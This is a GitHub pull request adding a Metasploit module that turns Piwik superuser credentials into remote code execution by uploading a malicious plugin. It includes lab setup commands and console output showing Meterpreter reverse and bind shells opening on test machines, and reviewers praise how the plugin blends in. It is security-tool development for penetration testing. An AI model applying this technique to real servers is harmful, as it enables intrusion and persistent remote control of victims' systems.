New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add piwik superuser plugin upload module #7917

Merged
merged 2 commits into from Feb 14, 2017

Conversation

Projects
None yet
4 participants
@FireFart
Contributor

FireFart commented Feb 5, 2017

This PR adds a module to upload a generated plugin to an piwik installation after you grabbed superuser credentials. This way you can turn superuser credentials into a remote code execution. The plugin also tries to enable the Marketplace plugin if it's currently deactivated. Only having admin rights is not enough for this module, you need real superuser access.

Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1 (you can get older versions from https://builds.piwik.org/)

To install on debian as root:

apt install apache2 php5 php5-mysql libapache2-mod-php5 mariadb-server unzip php5-gd php5-curl

wget https://builds.piwik.org/piwik.zip
unzip -d /var/www/html/ piwik.zip 
chown -R www-data:www-data /var/www/html/

mysql -u root -ppassword -e "CREATE DATABASE piwik;"
mysql -u root -ppassword -e "CREATE USER piwik@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik@localhost=PASSWORD('piwik');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik.* TO piwik@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

echo always_populate_raw_post_data=-1 > /etc/php5/apache2/conf.d/99-piwik.ini
service apache2 restart

After the install browse to http://IP/piwik/ and follow the installation steps. If you have an ad blocker installed you need to disable it for the site otherwise almost everything will be blocked.

Be sure to also deactivate the Marketplace plugin in Settings-->System-->Plugins to test this feature.

To test other piwik versions too:

wget https://builds.piwik.org/piwik-2.17.1.zip
unzip piwik-2.17.1.zip
mv piwik /var/www/html/piwik217
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik217;"
mysql -u root -ppassword -e "CREATE USER piwik217@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik217@localhost=PASSWORD('piwik217');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik217.* TO piwik217@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.16.0.zip
unzip piwik-2.16.0.zip
mv piwik /var/www/html/piwik216
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik216;"
mysql -u root -ppassword -e "CREATE USER piwik216@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik216@localhost=PASSWORD('piwik216');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik216.* TO piwik216@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.14.0.zip
unzip piwik-2.14.0.zip
mv piwik /var/www/html/piwik214
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik214;"
mysql -u root -ppassword -e "CREATE USER piwik214@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik214@localhost=PASSWORD('piwik214');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik214.* TO piwik214@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-1.12.zip
unzip piwik-1.12.zip
mv piwik /var/www/html/piwik112
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik112;"
mysql -u root -ppassword -e "CREATE USER piwik112@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik112@localhost=PASSWORD('piwik112');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik112.* TO piwik112@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

Sample Output:

msf exploit(piwik_admin_plugin_upload) > options

Module options (exploit/unix/webapp/piwik_admin_plugin_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   firefart         yes       The Piwik password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.2     yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /piwik/          yes       The URI path of the Piwik installation
   USERNAME   firefart         yes       The Piwik username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Piwik


msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:48145) at 2017-02-06 10:06:47 +0100
[+] Deleted plugins/PRDAvCIKBY/plugin.json
[+] Deleted plugins/PRDAvCIKBY/PRDAvCIKBY.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik217/
TARGETURI => /piwik217/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.17.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.2:48158) at 2017-02-06 10:07:14 +0100
[+] Deleted plugins/ygpstFTvqz/plugin.json
[+] Deleted plugins/ygpstFTvqz/ygpstFTvqz.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik216/
TARGETURI => /piwik216/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.16.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.2:48168) at 2017-02-06 10:07:31 +0100
[+] Deleted plugins/lmepCZtuzN/plugin.json
[+] Deleted plugins/lmepCZtuzN/lmepCZtuzN.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik214/
TARGETURI => /piwik214/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.14.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.2:48177) at 2017-02-06 10:07:46 +0100
[+] Deleted plugins/DhPhZeafJf/plugin.json
[+] Deleted plugins/DhPhZeafJf/DhPhZeafJf.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik112/
TARGETURI => /piwik112/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[-] Exploit aborted due to failure: not-found: The target does not appear to be running Piwik
[*] Exploit completed, but no session was created.
meterpreter > sysinfo
Computer    : web
OS          : Linux web 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
Meterpreter : php/linux
meterpreter > 

@FireFart FireFart added the module label Feb 5, 2017

@FireFart FireFart changed the title from add piwik admin plugin upload module to add piwik superuser plugin upload module Feb 7, 2017

@FireFart FireFart force-pushed the FireFart:piwik_plugin branch from 876fbe7 to baa473a Feb 10, 2017

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 13, 2017

I'll make you a deal. If you add module docs, i'll review this within the next 48hrs

@FireFart

This comment has been minimized.

Contributor

FireFart commented Feb 13, 2017

@h00die deal :) documentation added

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Feb 13, 2017

I nominate @h00die as documentation czar.

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 13, 2017

@wvu-r7

  1. theres no challengers
  2. i thought that was already agreed to
@FireFart

This comment has been minimized.

Contributor

FireFart commented Feb 13, 2017

@wvu-r7
a

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Feb 13, 2017

@h00die: We should give you a badge.

@h00die h00die self-assigned this Feb 14, 2017

@h00die h00die added the docs label Feb 14, 2017

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 14, 2017

Had some oddities but I think its due to my own configuration of running virtualbox and the portforwarding.
However, it did give me all the shells. I know @egypt <3 shells, and its valentines day and all... but shells picked me over him this time.

for completeness, i used a bind shell, and Ubuntu 14.04.

msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Trying to detect if target is running a supported version of piwik
[*] Started bind handler
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 1 opened (127.0.0.1:44559 -> 127.0.0.1) at 2017-02-14 00:40:13 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 1 closed.
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin XmZeBDefEZ generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/XmZeBDefEZ.php' on the target

[-] Invalid session identifier: 1
msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Started bind handler
[*] Trying to detect if target is running a supported version of piwik
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 2 opened (127.0.0.1:40109 -> 127.0.0.1:1337) at 2017-02-14 00:40:36 -0500
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin lCEYgTsmXq generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/lCEYgTsmXq.php' on the target

meterpreter > sysinfo
Computer    : piwiki
OS          : Linux piwiki 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64
Meterpreter : php/linux

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 14, 2017

Several things that are VERY nice about this module:
GPL license blends in with the rest (not sure if you manually set that)
Author is Piwik, which blends in nicely
version numbers are randomized, but look legit.

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 14, 2017

docs are beautiful. @wvu-r7 you should take notes 😛

@h00die h00die merged commit d7f6755 into rapid7:master Feb 14, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

h00die added a commit that referenced this pull request Feb 14, 2017

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 14, 2017

seriously though, the code is beautiful.

@h00die

This comment has been minimized.

Contributor

h00die commented Feb 14, 2017

Release Notes

An exploit for Piwik is now available. An authenticated super user can upload a malicious plugin that causes remote code execution.

@FireFart FireFart deleted the FireFart:piwik_plugin branch Feb 14, 2017

@FireFart

This comment has been minimized.

Contributor

FireFart commented Feb 14, 2017

Thanks @h00die :)

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Feb 14, 2017

Duly noted! Fantastic work as always, @FireFart. :D

@tdoan-r7 tdoan-r7 added the rn-exploit label Feb 22, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment